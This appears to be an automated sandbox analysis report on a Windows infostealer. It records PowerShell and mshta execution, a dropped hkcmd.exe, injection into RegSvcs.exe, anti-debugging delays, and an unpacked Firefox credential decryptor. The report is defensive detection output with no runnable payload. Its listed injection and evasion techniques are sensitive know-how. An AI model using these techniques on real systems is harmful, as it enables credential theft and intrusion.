                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeAPI/Special instruction interceptor: Address: 1467044
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 7392Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7462Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2114Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sgkiriu3\sgkiriu3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_12-105332
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeAPI coverage: 4.8 %
                    Source: C:\Windows\SysWOW64\mshta.exe TID: 6776Thread sleep count: 7392 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6584Thread sleep count: 7462 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2800Thread sleep count: 2114 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5896Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EB445A GetFileAttributesW,FindFirstFileW,FindClose,12_2_00EB445A
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EBC6D1 FindFirstFileW,FindClose,12_2_00EBC6D1
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EBC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_00EBC75C
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EBEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00EBEF95
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EBF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00EBF0F2
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EBF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_00EBF3F3
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EB37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00EB37EF
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EB3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00EB3B12
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EBBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_00EBBCBC
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00E549A0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: powershell.exe, 00000003.00000002.1323680110.0000000004728000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1323680110.0000000004728000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1329147941.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1329147941.0000000007C52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000003.00000002.1327335481.0000000006C03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FsulatedPMSFT_NetEventVmNetworkAdatper.cdxml
                    Source: powershell.exe, 00000003.00000002.1327335481.0000000006C03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Vom/fwlink/?LinkIDMSFTMSFT_NetEventVmNetworkAdatper.format.ps1xml
                    Source: powershell.exe, 00000003.00000002.1323680110.0000000004728000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: RegSvcs.exe, 0000000D.00000002.2451505649.0000000000728000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeAPI call chain: ExitProcess graph end nodegraph_12-104101
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeAPI call chain: ExitProcess graph end nodegraph_12-104173
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EC3F09 BlockInput,12_2_00EC3F09
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E53B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00E53B3A
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E85A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,12_2_00E85A7C
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E54B37 LoadLibraryA,GetProcAddress,12_2_00E54B37
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_01467310 mov eax, dword ptr fs:[00000030h]12_2_01467310
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_014672B0 mov eax, dword ptr fs:[00000030h]12_2_014672B0
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_01465C60 mov eax, dword ptr fs:[00000030h]12_2_01465C60
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EA80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,12_2_00EA80A9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E7A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00E7A155
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E7A124 SetUnhandledExceptionFilter,12_2_00E7A124
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: amsi32_516.amsi.csv, type: OTHER
                    Source: 12.2.hkcmd.exe.dc0000.0.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                    Source: 12.2.hkcmd.exe.dc0000.0.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                    Source: 12.2.hkcmd.exe.dc0000.0.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 2BB008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EA87B1 LogonUserW,12_2_00EA87B1
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E53B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00E53B3A
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00E548D7
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EB4C7F mouse_event,12_2_00EB4C7F
